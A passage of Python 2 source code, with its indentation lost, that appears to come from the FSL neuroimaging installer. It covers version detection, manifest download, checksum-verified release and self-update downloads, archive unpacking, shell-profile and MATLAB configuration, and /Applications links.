class GetFslDirError(Exception):
pass
@memoize
def get_fsldir(specified_dir=None, install=False):
'''Find the installed version of FSL using FSLDIR
or location of this script'''
def validate_fsldir(directory):
parent = os.path.dirname(directory)
if parent == directory:
raise GetFslDirError(
"%s appears to be the root folder" %
parent)
if not os.path.exists(parent):
raise GetFslDirError(
"%s doesn't exist" %
parent)
if not os.path.isdir(parent):
raise GetFslDirError(
"%s isn't a directory" %
parent)
if (os.path.exists(directory) and not
os.path.exists(os.path.join(
directory, 'etc', 'fslversion'
))):
raise GetFslDirError(
"%s exists and doesn't appear to be an installed FSL folder" %
directory)
if specified_dir:
if install is False:
if not check_fsl_install(specified_dir):
raise GetFslDirError(
"%s isn't an 'fsl' folder" %
specified_dir)
else:
validate_fsldir(specified_dir)
return specified_dir
try:
fsldir = os.environ['FSLDIR']
try:
validate_fsldir(fsldir)
except GetFslDirError:
# FSLDIR environment variable is incorrect!
MsgUser.warning('FSLDIR environment variable '
'does not point at FSL install, ignoring...')
MsgUser.debug('FSLDIR is set to %s - '
'this folder does not appear to exist' % (fsldir))
fsldir = None
else:
fsldir = fsldir.rstrip('/')
if MsgUser.isquiet():
return fsldir
except KeyError:
# Look to see if I'm in an FSL install
try:
my_parent = os.path.dirname(
os.path.dirname(os.path.realpath(__file__)))
except NameError:
# Running in debugger - __file__ not set, assume it's cwd
my_parent = os.path.dirname(
os.path.dirname(os.getcwd()))
try:
validate_fsldir(my_parent)
fsldir = my_parent
except GetFslDirError:
fsldir = None
if not install:
MsgUser.debug("asking about %s" % (fsldir))
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'inst_loc', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.falied(str(e))
return fsldir
else:
if not MsgUser.isquiet():
valid_dir = False
while not valid_dir:
fsldir = Settings.inst_qus.ask_question(
'location', default=fsldir)
try:
validate_fsldir(fsldir)
valid_dir = True
except GetFslDirError, e:
MsgUser.failed(str(e))
MsgUser.message(
'''Hint - press Enter to select the default value '''
'''given in the square brackets.
If you are specifying a destination folder this needs to either be an existing
FSL install folder or a folder that doesn't already exist.''')
fsldir = None
else:
raise GetFslDirError(
"I can't locate FSL, try again using '-d <FSLDIR>' "
"to specify where to find the FSL install")
return fsldir
def archive_version(archive):
'''Takes the path to a FSL install file
and works out what version it is.'''
if not os.path.isfile(archive):
raise NotAFslVersion("%s is not a file" % (archive))
else:
# file is of form: fsl-V.V.V-platform.extensions
(_, vstring, _) = archive.strip().split('-', 2)
try:
return Version(vstring)
except ValueError:
raise NotAFslVersion(
"%s doesn't look like "
"a version number" % (vstring))
class NotAFslVersion(Exception):
pass
class GetInstalledVersionError(Exception):
pass
def get_installed_version(fsldir):
'''Takes path to FSLDIR and finds installed version details'''
MsgUser.debug("Looking for fsl in %s" % fsldir)
v_file = os.path.join(fsldir, 'etc', 'fslversion')
if os.path.exists(v_file):
f = open(v_file)
v_string = f.readline()
f.close()
try:
version = Version(v_string.strip())
except ValueError:
raise NotAFslVersion(
"%s not a valid "
"version string" % (v_string.strip()))
else:
MsgUser.debug(
"No version information found - "
"is this actually an FSL dir?")
raise GetInstalledVersionError(
"Cannot find the version information - "
"is this actually an FSL dir?")
MsgUser.debug("Found version %s" % (version))
return version
def which_shell():
return os.path.basename(os.getenv("SHELL"))
class SelfUpdateError(Exception):
pass
def self_update(server_url):
'''Check for and apply an update to myself'''
# See if there is a newer version available
if 'fslinstaller' in sys.argv[0]:
try:
installer = get_installer(server_url)
except GetInstallerError, e:
MsgUser.debug("Failed to get installer version %s." % (str(e)))
raise SelfUpdateError('Failed to get installer version. '
'Please try again later.')
MsgUser.debug("Server has version " + installer['version'])
if Version(installer['version']) <= version:
MsgUser.debug("Installer is up-to-date.")
return
# There is a new version available - download it
MsgUser.message("There is a newer version (%s) of the installer "
"(you have %s) updating..." % (
installer['version'], version))
(_, tmpfname) = temp_file_name(mode='w', close=True)
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), installer['filename']))
download_file(
url=file_url,
localf=tmpfname)
if (
file_checksum(tmpfname, installer['checksum_type']) !=
installer['checksum']):
raise SelfUpdateError(
"Found update to installer but download "
"was corrupt. Please try again later.")
except DownloadFileError, e:
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
MsgUser.debug("Failed to update installer %s." % (str(e)))
raise SelfUpdateError(
'Found update to installer but unable to '
'download the new version. Please try again.')
else:
downloaded = True
# Now run the new installer
# EXEC new script with the options we were given
os.chmod(tmpfname, 0755)
c_args = [sys.executable, tmpfname, ]
c_args.extend(sys.argv[1:])
MsgUser.debug(
"Calling %s %s" % (sys.executable, c_args))
os.execv(sys.executable, c_args)
else:
# We are now running the newly downloaded installer
MsgUser.ok('Installer updated to latest version %s' % (str(version)))
MsgUser.ok("Installer self update successful.")
class ServerFailure(Exception):
pass
class BadVersion(Exception):
pass
class GetInstallerError(Exception):
pass
def get_installer(server_url):
MsgUser.debug("Checking %s for "
"installer information" % (server_url))
manifest = get_web_manifest(server_url)
return manifest['installer']
@memoize
def get_releases(server_url):
'''Return a hash with all information about available
versions for this OS'''
computer = Host
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
os_definition = manifest[computer.o_s][computer.vendor]
except KeyError:
raise UnsupportedOs("%s %s not supported by this installer" % (
computer.o_s, computer.vendor
))
t_version = computer.version.major
alias_t = 'alias'
if alias_t in os_definition.keys():
if str(t_version) in os_definition[alias_t]:
os_parent = os_definition[alias_t][
str(t_version)]['parent']
os_definition = manifest[computer.o_s][os_parent]
if computer.arch not in os_definition.keys():
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.arch
))
os_def = os_definition[computer.arch]
while t_version > 0:
MsgUser.debug("Trying version %s" % (t_version))
if str(t_version) not in os_def.keys():
MsgUser.debug("...not found")
t_version -= 1
else:
break
if t_version == 0:
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.version.major
))
elif t_version != computer.version.major:
MsgUser.warning(
"%s %s not officially supported "
"- trying to locate support for an earlier "
"version - this may not work" % (
computer.vendor, computer.version.major))
return os_definition[computer.arch][str(t_version)]
class ExtraDownloadError(Exception):
pass
@memoize
def get_extra(server_url, extra_type):
'''Return a hash with all information about available
versions of source code'''
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
extra = manifest[extra_type]
except KeyError:
raise ExtraDownloadError("Unrecognised extra %s" % (extra_type))
return extra
class ImproperlyConfigured(Exception):
pass
def list_releases(url):
releases = get_releases(url)
MsgUser.message("Available FSL versions for this OS:")
MsgUser.debug(releases)
for v, release in releases.items():
if 'date' in release:
rdate = release['date']
else:
rdate = "Third-party package"
MsgUser.message("%s\t(%s)" % (v, rdate))
def latest_release(url):
releases = get_releases(url)
MsgUser.debug("Got version information: %s" % (releases))
versions = [Version(x) for x in releases.keys()]
MsgUser.debug("Versions: %s" % (versions))
return releases[str(sorted(versions)[-1])]
class InstallInstallerError(Exception):
pass
def install_installer(fsldir):
'''Install this script into $FSLDIR/etc'''
targetfolder = os.path.join(fsldir, 'etc')
as_root = False
installer = os.path.abspath(__file__)
MsgUser.debug(
"Copying fslinstaller (%s) to %s" % (
installer,
targetfolder))
if not is_writeable(targetfolder):
if not is_writeable_as_root(targetfolder):
raise InstallInstallerError("Cannot write to folder as root user.")
else:
as_root = True
copy_file(
installer, os.path.join(targetfolder, "fslinstaller.py"),
as_root)
class InstallQuestions(object):
def __init__(self):
self.questions = {}
self.validators = {}
self.type = {}
self.default = {}
self.defaults = False
def add_question(self, key, question, default, qtype, validation_f):
self.questions[key] = question
self.default[key] = default
self.type[key] = qtype
self.validators[key] = validation_f
def ask_question(self, key, default=None):
# Ask a question
no_answer = True
validator = self.validators[key]
def parse_answer(q_type, answer):
if q_type == 'bool':
if answer.lower() == 'yes':
return True
else:
return False
else:
return answer
if not default:
default = self.default[key]
if self.defaults:
MsgUser.debug(self.questions[key])
MsgUser.debug("Automatically using the default %s" % (default))
self.answers[key] = parse_answer(self.type[key], default)
no_answer = False
while no_answer:
MsgUser.question(
"%s? %s:" % (
self.questions[key],
'[%s]' % (default)))
your_answer = raw_input()
MsgUser.debug("Your answer was %s" % (your_answer))
if your_answer == '':
MsgUser.debug("You want the default")
your_answer = default
if validator(your_answer):
answer = parse_answer(self.type[key], your_answer)
no_answer = False
MsgUser.debug("Returning the answer %s" % (answer))
return answer
def yes_no(answer):
if answer.lower() == 'yes' or answer.lower() == 'no':
return True
else:
MsgUser.message("Please enter yes or no.")
return False
def check_install_location(folder):
'''Don't allow relative paths'''
MsgUser.debug("Checking %s is an absolute path" % (folder))
if (folder == '.' or
folder == '..' or
folder.startswith('./') or
folder.startswith('../') or
folder.startswith('~')):
MsgUser.message("Please enter an absolute path.")
return False
return True
def external_validate(what_to_check):
'''We will validate elsewhere'''
return True
def check_fsl_install(fsldir):
'''Check if this folder contains FSL install'''
MsgUser.debug("Checking %s is an FSL install" % (fsldir))
if os.path.isdir(fsldir):
if os.path.exists(
os.path.join(fsldir, 'etc', 'fslversion')
):
return True
return False
def fsl_downloadname(suffix, version):
return 'fsl-%s-%s' % (
version, suffix)
class Settings(object):
version = version
title = "--- FSL Installer - Version %s ---" % (version)
main_server = 'fsl.fmrib.ox.ac.uk'
mirrors = [build_url_with_protocol('https',
main_server, ('fsldownloads',
'')), ]
mirrors_file = 'fslmirrorlist.txt'
manifest_json = 'manifest.json'
manifest_csv = 'manifest.csv'
main_mirror = mirrors[0]
mirror = main_mirror
applications = ['bin/fslview.app', 'bin/assistant.app']
x11 = {'bad_versions': [],
'download_url': "http://xquartz.macosforge.org/landing/",
'apps': ['XQuartz.app', 'X11.app', ],
'location': "/Applications/Utilities"}
default_location = '/usr/local/fsl'
post_inst_dir = "etc/fslconf"
inst_qus = InstallQuestions()
inst_qus.add_question('version_match',
"The requested version matches the installed "
"version - do you wish to re-install FSL",
'no', 'bool', yes_no)
inst_qus.add_question('location',
"Where would you like the FSL install to be "
"(including the FSL folder name)",
default_location, 'path', check_install_location)
inst_qus.add_question('del_old',
"FSL exists in the current location, "
"would you like to keep a backup of the old "
"version (N.B. You will not be able to use the old "
"version)",
'no', 'bool', yes_no)
inst_qus.add_question('create',
"Install location doesn't exist, should I create it",
'yes', 'bool', yes_no)
inst_qus.add_question('inst_loc',
"Where is the FSL folder (e.g. /usr/local/fsl)",
default_location, 'path', check_fsl_install)
inst_qus.add_question('skipmd5',
"I was unable to download the checksum of "
"the install file so cannot confirm it is correct. "
"Would you like to install anyway",
'no', 'bool', yes_no)
inst_qus.add_question('overwrite',
"There is already a local copy of the file, would "
"you like to overwrite it",
"yes", 'bool', yes_no)
inst_qus.add_question('upgrade',
"Would you like to install upgrade",
"yes", 'bool', yes_no)
inst_qus.add_question('update',
"Would you like to install update",
"yes", 'bool', yes_no)
def get_json(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
return json.load(url)
except OpenUrlError, e:
raise ServerFailure(str(e))
# [ linux, centos, x86_64, 6, filename, 'fname',
# version, 'version', date, 'date', checksum_type, 'checksum_type',
# checksum, 'checksum', supported, 'true/false', notes, 'notes',
# instructions, 'instructions']
# [ linux, redhat, alias, centos, supported, True/false, version, 'version' ]
# [ 'installer', filename, 'fname', version, 'version', date, 'date',
# checksum_type, 'checksum_type', checksum, 'checksum', supported,
# 'true/false', notes, 'notes', instructions, 'instructions']
# [ feeds, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
# [ sources, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
class AutoDict(dict):
'''Automatically create a nested dict'''
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
value = self[item] = type(self)()
return value
def freeze(self):
'''Returns a dict representation of an AutoDict'''
frozen = {}
for k, v in self.items():
if type(v) == type(self):
frozen[k] = v.freeze()
else:
frozen[k] = v
return frozen
def get_csv_dict(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
manifest_reader = csv.reader(
url, delimiter=',', quoting=csv.QUOTE_MINIMAL)
a_dict = AutoDict()
for line in manifest_reader:
MsgUser.debug(line)
if line[0] == 'feeds':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'sources':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'installer':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
else:
# Install package or alias
if line[2] == 'alias':
items = iter(line[4:])
base_dict = dict(zip(items, items))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])] = base_dict
else:
items = iter(line[5:])
base_dict = dict(zip(items, items))
MsgUser.debug(
",".join(
(line[0], line[1], line[2], line[3], line[4])))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])][
str(line[4])] = base_dict
except OpenUrlError, e:
raise ServerFailure(str(e))
MsgUser.debug(a_dict)
return a_dict.freeze()
class InvalidVersion(Exception):
pass
def get_web_version_and_details(
server_url=Settings.mirror,
request_version=None):
if request_version is None:
details = latest_release(server_url)
try:
version = Version(details['version'])
except KeyError:
try:
redirect = details['redirect']
raise DownloadError(
"Installer not supported on this platform."
"Please visit %s for download instructions" % redirect)
except KeyError:
MsgUser.debug(
"Can't find version or redirect - %s" % details)
raise DownloadError(
"Unsupported OS"
)
else:
MsgUser.debug("Requested version %s" % request_version)
releases = get_releases(server_url)
try:
version = Version(request_version)
except ValueError:
raise DownloadError(
"%s doesn't look like a version" % request_version)
if request_version not in releases.keys():
raise DownloadError(
"%s isn't an available version" % request_version)
details = releases[request_version]
return (version, details)
def download_release(
server_url=Settings.mirror, to_temp=False,
request_version=None, skip_verify=False,
keep=False, source_code=False, feeds=False):
(version, details) = get_web_version_and_details(
server_url, request_version)
if request_version is None:
request_version = str(version)
if source_code or feeds:
if source_code:
extra_type = 'sources'
MsgUser.message("Downloading source code")
else:
extra_type = 'feeds'
MsgUser.message("Downloading FEEDS")
try:
releases = get_extra(server_url, extra_type)
except ExtraDownloadError, e:
raise DownloadError(
"Unable to find details for %s" % (extra_type)
)
to_temp = False
try:
details = releases[request_version]
except KeyError:
raise DownloadError(
"%s %s isn't available" % (request_version, extra_type)
)
MsgUser.debug(details)
if to_temp:
try:
(_, local_filename) = temp_file_name(close=True)
except Exception, e:
MsgUser.debug("Error getting temporary file name %s" % (str(e)))
raise DownloadError("Unable to begin download")
else:
local_filename = details['filename']
if os.path.exists(local_filename):
if os.path.isfile(local_filename):
MsgUser.message("%s exists" % (local_filename))
overwrite = Settings.inst_qus.ask_question('overwrite')
if overwrite:
MsgUser.warning(
"Erasing existing file %s" % local_filename)
try:
os.remove(local_filename)
except Exception:
raise DownloadError(
"Unabled to remove local file %s - remove"
" it and try again" % local_filename)
else:
raise DownloadError("Aborting download")
else:
raise DownloadError(
"There is a directory named %s "
"- cannot overwrite" % local_filename)
MsgUser.debug(
"Downloading to file %s "
"(this may take some time)." % (local_filename))
MsgUser.message(
"Downloading...")
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), details['filename']))
download_file(
url=file_url,
localf=local_filename)
if (not skip_verify and
(details['checksum'] !=
file_checksum(local_filename, details['checksum_type']))):
raise DownloadError('Downloaded file fails checksum')
MsgUser.ok("File downloaded")
except DownloadFileError, e:
MsgUser.debug(str(e))
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
raise DownloadError(str(e))
else:
downloaded = True
return (local_filename, version, details)
class DownloadError(Exception):
pass
def shell_config(shell, fsldir, skip_root=False):
MsgUser.debug("Building environment for %s" % (shell))
env_lines = ''
if shell in BOURNE_SHELLS:
if skip_root:
env_lines += '''if [ -x /usr/bin/id ]; then
if [ -z "$EUID" ]; then
# ksh and dash doesn't setup the EUID environment var
EUID=`id -u`
fi
fi
if [ "$EUID" != "0" ]; then
'''
env_lines += '''
# FSL Setup
FSLDIR=%s
PATH=${FSLDIR}/bin:${PATH}
export FSLDIR PATH
. ${FSLDIR}/etc/fslconf/fsl.sh
'''
if skip_root:
env_lines += '''fi'''
match = "FSLDIR="
replace = "FSLDIR=%s"
elif shell in C_SHELLS:
if skip_root:
env_lines += '''if ( $uid != 0 ) then
'''
env_lines += '''
# FSL Setup
setenv FSLDIR %s
setenv PATH ${FSLDIR}/bin:${PATH}
source ${FSLDIR}/etc/fslconf/fsl.csh
'''
if skip_root:
env_lines += '''
endif'''
match = "setenv FSLDIR"
replace = "setenv FSLDIR %s"
elif shell == 'matlab':
env_lines = '''
%% FSL Setup
setenv( 'FSLDIR', '%s' );
fsldir = getenv('FSLDIR');
fsldirmpath = sprintf('%%s/etc/matlab',fsldir);
path(path, fsldirmpath);
clear fsldir fsldirmpath;
'''
match = "setenv( 'FSLDIR',"
replace = "setenv( 'FSLDIR', '%s' );"
else:
raise ValueError("Unknown shell type %s" % shell)
return (env_lines % (fsldir), match, replace % (fsldir))
def get_profile(shell):
home = os.path.expanduser("~")
dotprofile = os.path.join(home, '.profile')
if shell == 'bash':
profile = os.path.join(home, '.bash_profile')
if not os.path.isfile(profile) and os.path.isfile(dotprofile):
profile = dotprofile
elif shell == 'zsh':
profile = os.path.join(home, '.zprofile')
# ZSH will never source .profile
elif shell == 'sh':
profile = dotprofile
else:
cshprofile = os.path.join(home, '.cshrc')
if shell == 'csh':
profile = cshprofile
elif shell == 'tcsh':
profile = os.path.join(home, '.tcshrc')
if not os.path.isfile(profile) and os.path.isfile(cshprofile):
profile = cshprofile
else:
raise ValueError("Unsupported shell")
return profile
class FixFslDirError(Exception):
pass
def fix_fsldir(shell, fsldir):
(_, match, replace) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug(
"Editing %s, replacing line beginning:%s with %s." %
(profile, match, replace))
try:
edit_file(profile, line_starts_replace, match, replace, False)
except EditFileError, e:
raise FixFslDirError(str(e))
class AddFslDirError(Exception):
pass
def add_fsldir(shell, fsldir):
(env_lines, _, _) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug("Adding %s to %s" % (env_lines, profile))
try:
add_to_file(profile, env_lines, False)
except AddToFileError, e:
raise AddFslDirError(str(e))
class ConfigureMatlabError(Exception):
pass
class ConfigureMatlabWarn(Exception):
pass
def configure_matlab(fsldir, m_startup='', c_file=True):
'''Setup your startup.m file to enable FSL MATLAB functions to work'''
(mlines, match, replace) = shell_config('matlab', fsldir)
if m_startup == '':
m_startup = os.path.join(
os.path.expanduser('~'), 'matlab', 'startup.m')
if os.path.exists(m_startup):
# Check if already configured
MsgUser.debug("Looking for %s in %s" % (match, m_startup))
if file_contains(m_startup, match):
try:
MsgUser.debug('Updating MATLAB startup file.')
edit_file(
m_startup, line_starts_replace,
match, replace, False)
except EditFileError, e:
raise ConfigureMatlabError(str(e))
else:
MsgUser.debug('Adding FSL settings to MATLAB.')
try:
add_to_file(m_startup, mlines, False)
except AddToFileError, e:
raise ConfigureMatlabError(str(e))
elif c_file:
# No startup.m file found. Create one
try:
MsgUser.debug('No MATLAB startup.m file found, creating one.')
if not os.path.isdir(os.path.dirname(m_startup)):
MsgUser.debug('No MATLAB startup.m file found, creating one.')
os.mkdir(os.path.dirname(m_startup))
create_file(m_startup, mlines, False)
except (OSError, CreateFileError), e:
MsgUser.debug(
'Unable to create ~/matlab folder or startup.m file,'
' cannot configure (%).' % (str(e)))
raise ConfigureMatlabError(
"Unable to create your ~/matlab folder or startup.m, "
"so cannot configure MATLAB for FSL.")
else:
MsgUser.debug('MATLAB may not be installed, doing nothing.')
raise ConfigureMatlabWarn("I can't tell if you have MATLAB installed.")
class SetupEnvironmentError(Exception):
pass
class SetupEnvironmentSkip(Exception):
pass
def setup_system_environment(fsldir):
'''Add a system-wide profile setting up FSL for all users.
Only supported on Redhat/Centos'''
profile_d = '/etc/profile.d'
profile_files = ['fsl.sh', 'fsl.csh']
exceptions = []
skips = []
if os.getuid() != 0:
sudo = True
else:
sudo = False
if os.path.isdir(profile_d):
for profile in profile_files:
pf = profile.split('.')[1]
(lines, match, replace) = shell_config(pf, fsldir)
this_profile = os.path.join(profile_d, profile)
if os.path.exists(this_profile):
# Already has a profile file
# Does it contain an exact match for current FSLDIR?
match = file_contains_1stline(this_profile, replace)
if match != '':
# If there is an fsl.(c)sh then just fix
# the entry for FSLDIR
MsgUser.debug(
"Fixing %s for FSLDIR location." % (this_profile))
try:
edit_file(
this_profile, line_starts_replace,
match, replace, sudo)
except EditFileError, e:
exceptions.append(str(e))
else:
# No need to do anything
MsgUser.debug(
"%s already configured - skipping." %
(this_profile))
skips.append(profile)
else:
# Create the file
try:
create_file(this_profile, lines, sudo)
except CreateFileError, e:
exceptions.append(str(e))
else:
raise SetupEnvironmentError(
"No system-wide configuration folder found - Skipped")
if exceptions:
raise SetupEnvironmentError(".".join(exceptions))
if skips:
raise SetupEnvironmentSkip(".".join(skips))
def setup_environment(fsldir=None, system=False, with_matlab=False):
'''Setup the user's environment so that their
terminal finds the FSL tools etc.'''
# Check for presence of profile file:
if fsldir is None:
fsldir = get_fsldir()
user_shell = which_shell()
MsgUser.debug("User's shell is %s" % (user_shell))
try:
(profile_lines, _, _) = shell_config(user_shell, fsldir)
profile = get_profile(user_shell)
except ValueError, e:
raise SetupEnvironmentError(str(e))
cfile = False
if not os.path.isfile(profile):
MsgUser.debug("User is missing a shell setup file.")
cfile = True
if cfile:
MsgUser.debug("Creating file %s" % (profile))
try:
create_file(profile, profile_lines, False)
except CreateFileError, e:
raise SetupEnvironmentError(
"Unable to create profile %s" % (profile))
else:
# Check if user already has FSLDIR set
MsgUser.message("Setting up FSL software...")
try:
if file_contains(profile, "FSLDIR"):
MsgUser.debug("Updating FSLDIR entry.")
fix_fsldir(user_shell, fsldir)
else:
MsgUser.debug("Adding FSLDIR entry.")
add_fsldir(user_shell, fsldir)
except (AddFslDirError, FixFslDirError), e:
raise SetupEnvironmentError(
"Unable to update your profile %s"
" with FSL settings" % (profile))
if with_matlab:
MsgUser.debug("Setting up MATLAB")
try:
configure_matlab(fsldir)
except ConfigureMatlabError, e:
MsgUser.debug(str(e))
raise SetupEnvironmentError(str(e))
except ConfigureMatlabWarn, e:
MsgUser.skipped(str(e))
class PostInstallError(Exception):
pass
class InstallArchiveError(Exception):
pass
class UnknownArchiveType(Exception):
pass
def archive_type(archive):
'''Determine file type based on extension and check
that file looks like this file type'''
archive_types = {
'gzip': ('tar', '-z'),
'bzip2': ('tar', '-j'),
'zip': ('zip', ''), }
try:
file_type = run_cmd("file %s" % (archive))
except RunCommandError, e:
raise UnknownArchiveType(str(e))
file_type = file_type.lower()
for f_type in ('gzip', 'bzip2', 'zip', ):
if f_type in file_type:
return archive_types[f_type]
raise UnknownArchiveType(archive)
def post_install(
fsldir, settings, script="post_install.sh", quiet=False,
app_links=False, x11=False):
MsgUser.message("Performing post install tasks")
if is_writeable(fsldir):
as_root = False
elif is_writeable_as_root(fsldir):
as_root = True
else:
raise PostInstallError(
"Unable to write to target folder (%s)" % (fsldir))
install_installer(fsldir)
script_path = os.path.join(fsldir, Settings.post_inst_dir, script)
if x11:
try:
check_X11(settings.x11)
except CheckX11Warning, e:
MsgUser.warning(str(e))
else:
MsgUser.ok("X11 (required for GUIs) found")
if os.path.exists(script_path):
MsgUser.debug("Found post-install script %s" % (script_path))
if not os.access(script_path, os.X_OK):
raise PostInstallError(
"Unable to run post install script %s" % (script_path)
)
script_opts = '-f "%s"' % (fsldir)
if quiet:
script_opts += " -q"
command_line = " ".join((script_path, script_opts))
try:
run_cmd_displayoutput(command_line, as_root=as_root)
except RunCommandError, e:
raise PostInstallError(
"Error running post installation script (error %s)"
" - check the install log" % (str(e))
)
# Work around for mistake in 5.0.10 post setup script
mal = os.path.join(
fsldir, Settings.post_inst_dir,
'make_applications_links.sh')
if (os.path.exists(mal) and
not file_contains(script_path, "make_applications_links.sh")):
MsgUser.debug(
"Work around necessary for missing app link creation")
else:
app_links = False
if app_links:
try:
make_applications_links(fsldir, settings.applications)
except MakeApplicationLinksError, e:
for message in e.app_messages.values():
MsgUser.warning(message)
else:
MsgUser.ok("/Applications links created/updated")
MsgUser.ok("Post installation setup complete")
def install_archive(archive, fsldir=None):
def clean_up_temp():
try:
safe_delete(tempfolder, as_root)
except SafeDeleteError, sd_e:
MsgUser.debug(
"Unable to clean up temporary folder! "
"%s" % (str(sd_e)))
if not os.path.isfile(archive):
raise InstallError("%s isn't a file" % (archive))
if not fsldir:
try:
fsldir = get_fsldir(specified_dir=fsldir, install=True)
except GetFslDirError, e:
raise InstallError(str(e))
MsgUser.debug("Requested install of %s as %s" % (archive, fsldir))
if os.path.exists(fsldir):
# move old one out of way
MsgUser.debug("FSL version already installed")
keep_old = Settings.inst_qus.ask_question('del_old')
else:
keep_old = False
install_d = os.path.dirname(fsldir)
MsgUser.debug("Checking %s is writeable." % (install_d))
if is_writeable(install_d):
as_root = False
elif is_writeable_as_root(install_d):
as_root = True
else:
raise InstallArchiveError(
"Unable to write to target folder (%s), "
"even as a super user." % (install_d))
MsgUser.debug("Does %s require root for deletion? %s" % (
install_d, as_root))
try:
unarchive, ua_option = archive_type(archive)
except UnknownArchiveType, e:
raise InstallArchiveError(str(e))
# Generate a temporary name - eg fsl-<mypid>-date
tempname = '-'.join(('fsl', str(os.getpid()), str(time.time())))
tempfolder = os.path.join(install_d, tempname)
try:
run_cmd_dropstdout("mkdir %s" % (tempfolder), as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError(
"Unable to create folder to install into.")
MsgUser.debug(
"Unpacking %s into folder %s." % (archive, tempfolder))
try:
if unarchive == 'tar':
unpack_cmd = 'tar -C %s -x %s -o -f %s' % (
tempfolder, ua_option, archive)
elif unarchive == 'zip':
MsgUser.debug(
"Calling unzip %s %s" % (ua_option, archive)
)
unpack_cmd = 'unzip %s %s' % (ua_option, archive)
try:
run_cmd_dropstdout(unpack_cmd, as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError("Unable to unpack FSL.")
new_fsl = os.path.join(tempfolder, 'fsl')
if os.path.exists(fsldir):
# move old one out of way
try:
old_version = get_installed_version(fsldir)
except (NotAFslVersion, GetInstalledVersionError), e:
if keep_old:
old_version = Version('0.0.0')
MsgUser.warning(
"The contents of %s doesn't look like an "
"FSL installation! - "
"moving to fsl-0.0.0" % (fsldir))
old_fsl = '-'.join((fsldir, str(old_version)))
if os.path.exists(old_fsl):
MsgUser.debug(
"Looks like there is another copy of the "
"old version of FSL - deleting...")
try:
safe_delete(old_fsl, as_root)
except SafeDeleteError, e:
raise InstallError(
";".join((
"Install location already has a "
"%s - I've tried to delete it but"
" failed" % (old_fsl), str(e))))
if keep_old:
try:
MsgUser.debug(
"Moving %s to %s" % (fsldir, old_fsl))
move(fsldir, old_fsl, as_root)
MsgUser.message(
'''You can find your archived version of FSL in %s.
If you wish to restore it, remove %s and rename %s to %s''' % (
old_fsl, fsldir, old_fsl, fsldir))
except MoveError, mv_e:
# failed to move the old version
MsgUser.debug(
"Failed to move old version "
"- %s" % (str(mv_e)))
raise InstallError(
"Failed to backup old version (%s)" % (str(mv_e)))
else:
MsgUser.debug("Removing existing FSL install")
try:
safe_delete(fsldir, as_root)
MsgUser.debug("Deleted %s." % (fsldir))
except SafeDeleteError, e:
raise InstallError(
"Failed to delete %s - %s." % (fsldir, str(e)))
else:
old_fsl = ''
try:
MsgUser.debug("Moving %s to %s" % (new_fsl, fsldir))
move(new_fsl, fsldir, as_root)
except MoveError, e:
# Unable to move new install into place
MsgUser.debug(
"Move failed - %s." % (str(e)))
raise InstallError(
'Failed to move new version into place.')
except InstallError, e:
clean_up_temp()
raise InstallArchiveError(str(e))
clean_up_temp()
MsgUser.debug("Install complete")
MsgUser.ok("FSL software installed.")
return fsldir
def check_for_updates(url, fsldir, requested_v=None):
# Start an update
MsgUser.message("Looking for new version.")
try:
this_version = get_installed_version(fsldir)
except GetInstalledVersionError, e:
# We can't find an installed version of FSL!
raise InstallError(str(e))
else:
MsgUser.debug("You have version %s" % (this_version))
if not requested_v:
version = Version(latest_release(url)['version'])
else:
try:
version = Version(requested_v)
except NotAFslVersion:
raise InstallError(
"%s doesn't look like a version" % requested_v)
if version > this_version:
# Update Available
if version.major > this_version.major:
# We don't support patching between major
# versions so download a fresh copy
return (UPGRADE, version)
else:
return (UPDATE, version)
else:
return (CURRENT, None)
class MakeApplicationLinksError(Exception):
def __init__(self, *args):
super(MakeApplicationLinksError, self).__init__(*args)
try:
self.app_messages = args[0]
except IndexError:
self.app_messages = []
def make_applications_links(fsldir, apps):
'''Create symlinks in /Applications'''
MsgUser.message("Creating Application links...")
results = {}
for app in apps:
app_location = os.path.join('/Applications', os.path.basename(app))
app_target = os.path.join(fsldir, app)
create_link = True
MsgUser.debug("Looking for existing link %s" % (app_location))
if os.path.lexists(app_location):
MsgUser.debug(
"Is a link: %s; realpath: %s" % (
os.path.islink(app_location),
os.path.realpath(app_location)))
if os.path.islink(app_location):
MsgUser.debug("A link already exists.")
if os.path.realpath(app_location) != app_target:
MsgUser.debug(
"Deleting old (incorrect) link %s" % (app_location))
try:
run_cmd_dropstdout("rm " + app_location, as_root=True)
except RunCommandError, e:
MsgUser.debug(
"Unable to remove broken"
" link to %s (%s)." % (app_target, str(e)))
